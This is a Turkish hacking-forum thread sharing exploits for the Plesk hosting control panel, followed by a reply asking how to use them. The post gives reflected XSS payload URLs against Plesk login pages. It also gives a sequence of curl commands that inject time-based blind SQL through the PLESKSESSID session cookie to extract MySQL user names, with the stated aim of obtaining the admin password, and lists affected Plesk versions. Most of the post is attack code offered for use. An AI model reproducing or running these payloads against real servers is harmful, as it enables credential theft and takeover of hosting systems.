Plesk açık

[baracuda81]

http://www.example.com:8443/get_password.php/>"><ScRiPt>alert(15031988)</ScRiPt>
http://www.example.com:8443/login_up.php3/>"><ScRiPt>alert(15031988)</ScRiPt>

etkilenen sistemler :
Plesk Plesk 8.0.1
Plesk Plesk 7.5

Bu açıkla javascript kodları çalıştıralabiliyor.

Diğer bir açık

1) Delay=5224.3877
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,1,1)=char(97),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

2) Delay=5165.3031
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,2,1)=char(100),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

3) Delay=5158.9512
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,3,1)=char(109),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

4) Delay=5224.0980
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,4,1)=char(105),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

5) Delay=5241.5251
Curl.exe -k "https://www.???.com:8443/login.php3" --cookie
"PLESKSESSID=1' union select if
(substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3
from mysql.user/*"

Etkilenen sistemler
SWSoft Plesk 8.2
SWSoft Plesk 8.1.1
SWSoft Plesk 8.1
SWSoft Plesk 7.6.1

Bu açıkla admin şifresi alınabiliyor

 

[arif44]

kardeşim teşekkürler güzel ve pek nadir paylaşılan bir paylaşım olmuş yanlız o java scriptleri nerde ve nasıl kullanacağız biraz daha bilgi verirsen çok daha süper olur + konuyu değerlendirdim birde teşekkür ettim rep butonunu göremedim :S